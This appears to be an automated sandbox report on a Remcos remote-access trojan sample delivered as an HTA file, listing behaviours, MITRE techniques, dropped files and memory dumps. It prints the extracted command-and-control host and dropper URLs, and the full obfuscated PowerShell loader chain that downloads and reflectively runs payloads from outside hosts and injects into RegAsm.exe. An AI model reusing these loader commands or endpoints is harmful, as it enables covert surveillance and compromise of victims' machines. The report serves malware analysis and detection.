remcos | e15bf785da97ec4893315687222ab28f491b49de7e95558086cd59d23b85c057

Analysis

max time kernel
149s
max time network
150s
platform
windows10-2004_x64
resource
win10v2004-20240802-en
resource tags

arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
submitted
25-09-2024 00:31

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

IEnetbookCookies.hta
Size

115KB
MD5

e22849cf884da37532e50f50a298c344
SHA1

b40e6ca50290ed885ff60c691444b33f3fb0a643
SHA256

e15bf785da97ec4893315687222ab28f491b49de7e95558086cd59d23b85c057
SHA512

7d241fe5b00949a1b3f12f86359f1870a19fbf400b7ebb10ae6936ea44ab6ac01cd838d801a7be502b3e58c97c33db317ef1d0bc12db108f2f766ad6bf03b40e
SSDEEP

96:Ea+M7XN7VQ63VQcuLNdfJ1LV9jzeVQda8AT:Ea+QXgXPnzILT

Score

10^/10

remcos zynova defense_evasion discovery execution rat

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://ia600100.us.archive.org/24/items/detah-note-v/DetahNoteV.txt

exe.dropper

https://ia600100.us.archive.org/24/items/detah-note-v/DetahNoteV.txt

Extracted

Family

remcos

Botnet

zynova

2024remcmon.duckdns.org:14645

Attributes

audio_folder
MicRecords
audio_record_time
5
connect_delay
0
connect_interval
1
copy_file
remcos.exe
copy_folder
Remcos
delete_file
false
hide_file
false
hide_keylog_file
false
install_flag
false
keylog_crypt
false
keylog_file
logs.dat
keylog_flag
false
keylog_folder
remcos
mouse_option
false
mutex
Rmc-R2I0JW
screenshot_crypt
false
screenshot_flag
false
screenshot_folder
Screenshots
screenshot_path
%AppData%
screenshot_time
10
take_screenshot_option
false
take_screenshot_time
5

Signatures

Remcos
Remcos is a closed-source remote control and surveillance software.
rat remcos

Blocklisted process makes network request 3 IoCs

flow	pid	Process
15	4956	powershell.exe
20	1052	powershell.exe
32	1052	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
4552	powershell.exe
1052	powershell.exe

Evasion via Device Credential Deployment 1 IoCs

defense_evasion execution

pid	Process
4956	powershell.exe

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\Control Panel\International\Geo\Nation	mshta.exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 1052 set thread context of 4896	1052	powershell.exe	98

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 9 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RegAsm.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	csc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cvtres.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings	powershell.exe

Suspicious behavior: EnumeratesProcesses 6 IoCs

pid	Process
4956	powershell.exe
4956	powershell.exe
4552	powershell.exe
4552	powershell.exe
1052	powershell.exe
1052	powershell.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeDebugPrivilege	4956	powershell.exe
Token: SeDebugPrivilege	4552	powershell.exe
Token: SeDebugPrivilege	1052	powershell.exe

Suspicious use of WriteProcessMemory 33 IoCs

description	pid	Process	procid_target
PID 5004 wrote to memory of 4008	5004	mshta.exe	82
PID 5004 wrote to memory of 4008	5004	mshta.exe	82
PID 5004 wrote to memory of 4008	5004	mshta.exe	82
PID 4008 wrote to memory of 4956	4008	cmd.exe	84
PID 4008 wrote to memory of 4956	4008	cmd.exe	84
PID 4008 wrote to memory of 4956	4008	cmd.exe	84
PID 4956 wrote to memory of 896	4956	powershell.exe	85
PID 4956 wrote to memory of 896	4956	powershell.exe	85
PID 4956 wrote to memory of 896	4956	powershell.exe	85
PID 896 wrote to memory of 3056	896	csc.exe	86
PID 896 wrote to memory of 3056	896	csc.exe	86
PID 896 wrote to memory of 3056	896	csc.exe	86
PID 4956 wrote to memory of 5032	4956	powershell.exe	87
PID 4956 wrote to memory of 5032	4956	powershell.exe	87
PID 4956 wrote to memory of 5032	4956	powershell.exe	87
PID 5032 wrote to memory of 4552	5032	WScript.exe	88
PID 5032 wrote to memory of 4552	5032	WScript.exe	88
PID 5032 wrote to memory of 4552	5032	WScript.exe	88
PID 4552 wrote to memory of 1052	4552	powershell.exe	90
PID 4552 wrote to memory of 1052	4552	powershell.exe	90
PID 4552 wrote to memory of 1052	4552	powershell.exe	90
PID 1052 wrote to memory of 4896	1052	powershell.exe	98
PID 1052 wrote to memory of 4896	1052	powershell.exe	98
PID 1052 wrote to memory of 4896	1052	powershell.exe	98
PID 1052 wrote to memory of 4896	1052	powershell.exe	98
PID 1052 wrote to memory of 4896	1052	powershell.exe	98
PID 1052 wrote to memory of 4896	1052	powershell.exe	98
PID 1052 wrote to memory of 4896	1052	powershell.exe	98
PID 1052 wrote to memory of 4896	1052	powershell.exe	98
PID 1052 wrote to memory of 4896	1052	powershell.exe	98
PID 1052 wrote to memory of 4896	1052	powershell.exe	98
PID 1052 wrote to memory of 4896	1052	powershell.exe	98
PID 1052 wrote to memory of 4896	1052	powershell.exe	98

C:\Windows\SysWOW64\mshta.exe
C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\IEnetbookCookies.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
1⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:5004
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\system32\cmd.exe" "/C pOWersHElL -ex ByPasS -Nop -w 1 -C deVIcECRedeNtiaLDeploYmeNt ; iex($(IeX('[sYStEm.tEXT.ENCoding]'+[ChAr]58+[chAR]0X3A+'utf8.gEtSTrInG([SySTem.COnveRT]'+[Char]0x3a+[cHAR]0X3A+'fROmbasE64STring('+[ChAr]0X22+'JG9QMmVEVUJFZ2ogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURkLXR5UEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbUVtQmVyZGVmaW5JVGlPTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVcmxtb24iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBOLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGZObEMsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdCx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgS0xYWU9ZZXEsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbUpBenZBKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiVmsiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTUVTUGFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRtQSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkb1AyZURVQkVnajo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzEzNC4yNTUuMjI3LjI0OC94YW1wcC9rYi9uaWNlcGljdHVyZXdpdGhoZXJpbWFnZXNnb29kLnRJRiIsIiRlTnY6QVBQREFUQVxuaWNlcGljdHVyZXdpdGhoZXJpbWFnZXNnb29kLnZCUyIsMCwwKTtzdEFSVC1TTGVFUCgzKTtTVGFSdCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRU52OkFQUERBVEFcbmljZXBpY3R1cmV3aXRoaGVyaW1hZ2VzZ29vZC52QlMi'+[ChAr]34+'))')))"
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:4008
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    pOWersHElL -ex ByPasS -Nop -w 1 -C deVIcECRedeNtiaLDeploYmeNt ; iex($(IeX('[sYStEm.tEXT.ENCoding]'+[ChAr]58+[chAR]0X3A+'utf8.gEtSTrInG([SySTem.COnveRT]'+[Char]0x3a+[cHAR]0X3A+'fROmbasE64STring('+[ChAr]0X22+'JG9QMmVEVUJFZ2ogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURkLXR5UEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbUVtQmVyZGVmaW5JVGlPTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVcmxtb24iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBOLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGZObEMsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdCx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgS0xYWU9ZZXEsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbUpBenZBKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiVmsiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTUVTUGFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRtQSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkb1AyZURVQkVnajo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzEzNC4yNTUuMjI3LjI0OC94YW1wcC9rYi9uaWNlcGljdHVyZXdpdGhoZXJpbWFnZXNnb29kLnRJRiIsIiRlTnY6QVBQREFUQVxuaWNlcGljdHVyZXdpdGhoZXJpbWFnZXNnb29kLnZCUyIsMCwwKTtzdEFSVC1TTGVFUCgzKTtTVGFSdCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRU52OkFQUERBVEFcbmljZXBpY3R1cmV3aXRoaGVyaW1hZ2VzZ29vZC52QlMi'+[ChAr]34+'))')))"
    3⤵
    - Blocklisted process makes network request
    - Evasion via Device Credential Deployment
    - System Location Discovery: System Language Discovery
    - Modifies registry class
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:4956
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\fok2loum\fok2loum.cmdline"
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:896
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES9114.tmp" "c:\Users\Admin\AppData\Local\Temp\fok2loum\CSCFE8E972462D4E0384813D2346554AD7.TMP"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:3056
  - - C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\nicepicturewithherimagesgood.vBS"
      4⤵
      Checks computer location settings
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:5032
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiAoICRzaEVsbElkWzFdKyRTSEVsTGlEWzEzXSsneCcpICggKCd4UGl1cmwnKycgPScrJyBzJysna3JodHRwJysnczovLycrJ2lhNjAwMTAwJysnLnVzLicrJ2FyY2hpdicrJ2Uub3JnJysnLzI0L2l0JysnZScrJ21zL2RldGFoLScrJ25vdGUtJysndi9EZScrJ3RhaE5vdGVWJysnLnR4dHNrJysncjt4UGknKydiYScrJ3NlJysnNjRDbycrJ24nKyd0ZScrJ250ID0gKCcrJ05ldy1PYmplJysnY3QgUycrJ3lzdGVtLicrJ05ldC5XZWJDJysnbGknKydlbnQpLicrJ0Rvd25sJysnb2FkU3RyaW4nKydnKHhQaXVybCk7JysneFAnKydpJysnYmluYXJ5JysnQ29udGUnKydudCA9IFtTeXN0JysnZW0uQ29udmVydF06OkZyb21CJysnYScrJ3NlNjRTJysndHJpbicrJ2coeFBpJysnYmFzZTY0Q29udGUnKyduJysndCk7eFBpYXMnKydzZW1ibHkgPScrJyBbUmVmbGVjJysndCcrJ2knKydvbi5Bc3NlbWJseScrJ106JysnOkwnKydvYWQoJysneFBpYmluJysnYXInKyd5Q29udGVudCk7eFAnKydpdHknKydwZSA9IHgnKydQaWFzJysnc2VtJysnYicrJ2x5LkdlJysndFR5cCcrJ2Uoc2tyJysnUnUnKyduUCcrJ0UuSG9tZXNrcicrJyk7eFBpJysnbWUnKyd0aG9kID0geFBpdHknKydwZS5HZXRNZXQnKydobycrJ2QoJysnc2tyVkFJc2tyJysnKTt4UCcrJ2knKydtZXRob2QnKycuSW52Jysnb2tlKHhQaW51bGwnKycsJysnIFsnKydvYmplJysnY3RbXV1AJysnKHNrcnR4dC5LS1JPTksnKycvYmsvcHBtYXgnKycvODQyLjcnKycyJysnMi41NTIuNDMxLy86cCcrJ3R0aHNrciAsJysnICcrJ3MnKydrcmRlc2F0aXZhZG8nKydza3IgLCAnKydza3JkJysnZXNhdGl2JysnYWQnKydvcycrJ2snKydyICcrJywgc2tyZCcrJ2UnKydzYXRpdmFkb3Nrcixza3JSZScrJ2dBcycrJ21zaycrJ3Isc2tyc2tyKSknKS5SRVBsQWNFKCd4UGknLCckJykuUkVQbEFjRSgoW2NIQXJdMTE1K1tjSEFyXTEwNytbY0hBcl0xMTQpLFtTVHJpTkddW2NIQXJdMzkpKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
        5⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:4552
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "& ( $shEllId[1]+$SHElLiD[13]+'x') ( ('xPiurl'+' ='+' s'+'krhttp'+'s://'+'ia600100'+'.us.'+'archiv'+'e.org'+'/24/it'+'e'+'ms/detah-'+'note-'+'v/De'+'tahNoteV'+'.txtsk'+'r;xPi'+'ba'+'se'+'64Co'+'n'+'te'+'nt = ('+'New-Obje'+'ct S'+'ystem.'+'Net.WebC'+'li'+'ent).'+'Downl'+'oadStrin'+'g(xPiurl);'+'xP'+'i'+'binary'+'Conte'+'nt = [Syst'+'em.Convert]::FromB'+'a'+'se64S'+'trin'+'g(xPi'+'base64Conte'+'n'+'t);xPias'+'sembly ='+' [Reflec'+'t'+'i'+'on.Assembly'+']:'+':L'+'oad('+'xPibin'+'ar'+'yContent);xP'+'ity'+'pe = x'+'Pias'+'sem'+'b'+'ly.Ge'+'tTyp'+'e(skr'+'Ru'+'nP'+'E.Homeskr'+');xPi'+'me'+'thod = xPity'+'pe.GetMet'+'ho'+'d('+'skrVAIskr'+');xP'+'i'+'method'+'.Inv'+'oke(xPinull'+','+' ['+'obje'+'ct[]]@'+'(skrtxt.KKRONK'+'/bk/ppmax'+'/842.7'+'2'+'2.552.431//:p'+'tthskr ,'+' '+'s'+'krdesativado'+'skr , '+'skrd'+'esativ'+'ad'+'os'+'k'+'r '+', skrd'+'e'+'sativadoskr,skrRe'+'gAs'+'msk'+'r,skrskr))').REPlAcE('xPi','$').REPlAcE(([cHAr]115+[cHAr]107+[cHAr]114),[STriNG][cHAr]39))"
        6⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Suspicious use of SetThreadContext
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:1052
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:4896

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
9faf6f9cd1992cdebfd8e34b48ea9330

SHA1
ae792d2551c6b4ad5f3fa5585c0b0d911c9f868e

SHA256
0c45700b2e83b229e25383569b85ddc0107450c43443a11633b53daf1aaed953

SHA512
05b34627f348b2973455691bcb7131e4a5236cfece653d22432746ccd14d211b9b279f0913fbd7bb150f00eb2f2c872f4f5518f3903e024699fd23c50d679e97

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
12KB

MD5
599a03ede329b1d0f800bb586ee66b12

SHA1
85cc4170f103ebfed68c4e39f863eb281935711d

SHA256
73f4da44d107e19f3c505ead33b154842baa668ac7862689b4789314f87ff6e0

SHA512
f602a2cde15dd539e2339720fdea3b68379c490cb8e3594874ef3c190712bfcdb751da3496b6abe37a3cf18a28a9f9e07813e0acbc66801e87f64e2ce60c0dd9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
19KB

MD5
4b90efdae873fb6765dee53a43ce8fd4

SHA1
d5c6f1a88c5eec14b650180954363431e7ba2a13

SHA256
23bd127a77aac6ae4c9034d493abb749810c396d47279f174db79ab92af741cb

SHA512
4b1a3e93858037e188b804d691c351e10092fb8f219eb4fa9767d4a4ee460d3140d0fb0e8620e25b0e2dda5f32eda5f69c5f4837835a8676faaae5044ba1d6f3

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES9114.tmp

Filesize
1KB

MD5
a676d4a4de840525d73f67cefcf87bf8

SHA1
9c8e1b0a7477b64b79d72d870512d2fd16649aad

SHA256
95fc995c63c239daef827535b66a5f361158e437b13e2bc85c656e7378f01105

SHA512
53c2cbda96d6e2a78a0e9b09edbe07ab8351a4510b82a2d0b015a69d5f4a678a963c4d10432e570d2a9bbf44583259a34f02f02ff7cf0ba98b72fd42a64dd355

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_v2dzxpn1.usr.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\fok2loum\fok2loum.dll

Filesize
3KB

MD5
e27aa09bc970f9bbb2ccce2f41258f7d

SHA1
01c5d95601dc2ccb2669261c7de9313c69f6b87c

SHA256
81deccefd11ec1e98d35dccfd8b12cd16e3715c1ae13b7036f02477e2f9897bc

SHA512
139bd2b152c4a39f8dd0a11b2a196b62b17ad43967e26c3291a3aa6702246cfb76fef1386d216e695163f618bec94b6b3877e8a8c1e104972d1c961ad602dd11

Download Submit
C:\Users\Admin\AppData\Roaming\nicepicturewithherimagesgood.vBS

Filesize
257KB

MD5
134f2e8115174dea5246b807fd0c8427

SHA1
c47a738087706c17b345c8b93b8eb71c1518e3a8

SHA256
01b5377b8e2fd5cc88c57a2115fefc853ddecbf4aff300357391dcd803b7d67d

SHA512
efc7386287e271b6d1050f1c585073351b0b9cc9cd551cb759f02fbe4a492bb3ff20b3d498cd608558353b1879a591ae630e5e0e1e0d7286a31fdde7787c0c08

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\fok2loum\CSCFE8E972462D4E0384813D2346554AD7.TMP

Filesize
652B

MD5
8cf257e28439b193273d99b9a68a0227

SHA1
19f59a77b82b1238eb980f7f09ae19f3f9f54b15

SHA256
4c0a2f9e50611550354714034c7a4a337a60a85623e31487af7174490051657f

SHA512
d68ff2395baa0dd426b3732d54da640e3539cf7d944396cd4d481a000348ebccb120390f81828d0a3af88c0ffa5fddb7fb09899ac0c96f62af1831276118bb3f

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\fok2loum\fok2loum.0.cs

Filesize
458B

MD5
e07522da7bc6c3ae3fc141d4f7384edf

SHA1
0b2d7ab75bca2211d5aea9a1671929f033bbaf09

SHA256
b0428efd614521c6b91abdad5a9885a2698f8729a6fc77087383a4a07e28da19

SHA512
6d30515cd0dddd23f8d2554d107c5afee82d29aa7c5dc6878546758350c13bd8421b066b39bd1d782381e70e75f9afe1e521d301e9478ecf16f9b075ed34addd

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\fok2loum\fok2loum.cmdline

Filesize
369B

MD5
ecc7924395b238be87a11777095d63e5

SHA1
75856500c2f0c968c7a6c89583bca762f960d004

SHA256
6763b99218f11bd67cba8253c39cb2b26055c4116a3266ee1aa74e33e4862758

SHA512
7ee944b10f78f89069b783aa56eb2e3cb8cd47919733fba892b76537fbacfe98260f75282bd51b417a545566bc5dc2a674519059ef882ec206a811754fde526d

Download Submit
memory/1052-97-0x0000000007B00000-0x0000000007B9C000-memory.dmp

Filesize
624KB

Download
memory/1052-96-0x0000000007850000-0x0000000007A5C000-memory.dmp

Filesize
2.0MB

Download
memory/4552-84-0x0000000005B80000-0x0000000005ED4000-memory.dmp

Filesize
3.3MB

Download
memory/4896-112-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/4896-109-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/4896-116-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/4896-114-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/4896-115-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/4896-113-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/4896-118-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/4896-117-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/4896-108-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/4896-107-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/4896-106-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/4896-103-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/4896-101-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/4896-100-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/4896-98-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/4896-119-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/4956-41-0x0000000007240000-0x0000000007251000-memory.dmp

Filesize
68KB

Download
memory/4956-44-0x00000000072C0000-0x00000000072DA000-memory.dmp

Filesize
104KB

Download
memory/4956-7-0x0000000005680000-0x00000000056E6000-memory.dmp

Filesize
408KB

Download
memory/4956-6-0x0000000005610000-0x0000000005676000-memory.dmp

Filesize
408KB

Download
memory/4956-5-0x0000000004E10000-0x0000000004E32000-memory.dmp

Filesize
136KB

Download
memory/4956-58-0x00000000072B0000-0x00000000072B8000-memory.dmp

Filesize
32KB

Download
memory/4956-64-0x000000007170E000-0x000000007170F000-memory.dmp

Filesize
4KB

Download
memory/4956-65-0x0000000071700000-0x0000000071EB0000-memory.dmp

Filesize
7.7MB

Download
memory/4956-66-0x0000000007550000-0x0000000007572000-memory.dmp

Filesize
136KB

Download
memory/4956-67-0x00000000082F0000-0x0000000008894000-memory.dmp

Filesize
5.6MB

Download
memory/4956-4-0x0000000071700000-0x0000000071EB0000-memory.dmp

Filesize
7.7MB

Download
memory/4956-73-0x0000000071700000-0x0000000071EB0000-memory.dmp

Filesize
7.7MB

Download
memory/4956-3-0x0000000004F70000-0x0000000005598000-memory.dmp

Filesize
6.2MB

Download
memory/4956-19-0x0000000005D20000-0x0000000005D6C000-memory.dmp

Filesize
304KB

Download
memory/4956-2-0x0000000071700000-0x0000000071EB0000-memory.dmp

Filesize
7.7MB

Download
memory/4956-45-0x00000000072B0000-0x00000000072B8000-memory.dmp

Filesize
32KB

Download
memory/4956-0-0x000000007170E000-0x000000007170F000-memory.dmp

Filesize
4KB

Download
memory/4956-17-0x00000000057F0000-0x0000000005B44000-memory.dmp

Filesize
3.3MB

Download
memory/4956-43-0x0000000007280000-0x0000000007294000-memory.dmp

Filesize
80KB

Download
memory/4956-42-0x0000000007270000-0x000000000727E000-memory.dmp

Filesize
56KB

Download
memory/4956-18-0x0000000005CD0000-0x0000000005CEE000-memory.dmp

Filesize
120KB

Download
memory/4956-1-0x0000000002400000-0x0000000002436000-memory.dmp

Filesize
216KB

Download
memory/4956-40-0x00000000072E0000-0x0000000007376000-memory.dmp

Filesize
600KB

Download
memory/4956-39-0x00000000070C0000-0x00000000070CA000-memory.dmp

Filesize
40KB

Download
memory/4956-38-0x0000000004A10000-0x0000000004A2A000-memory.dmp

Filesize
104KB

Download
memory/4956-37-0x00000000076C0000-0x0000000007D3A000-memory.dmp

Filesize
6.5MB

Download
memory/4956-36-0x0000000071700000-0x0000000071EB0000-memory.dmp

Filesize
7.7MB

Download
memory/4956-35-0x0000000071700000-0x0000000071EB0000-memory.dmp

Filesize
7.7MB

Download
memory/4956-34-0x0000000006F90000-0x0000000007033000-memory.dmp

Filesize
652KB

Download
memory/4956-32-0x00000000062D0000-0x00000000062EE000-memory.dmp

Filesize
120KB

Download
memory/4956-33-0x0000000071700000-0x0000000071EB0000-memory.dmp

Filesize
7.7MB

Download
memory/4956-22-0x000000006E130000-0x000000006E484000-memory.dmp

Filesize
3.3MB

Download
memory/4956-20-0x0000000006CB0000-0x0000000006CE2000-memory.dmp

Filesize
200KB

Download
memory/4956-21-0x000000006DFC0000-0x000000006E00C000-memory.dmp

Filesize
304KB

Download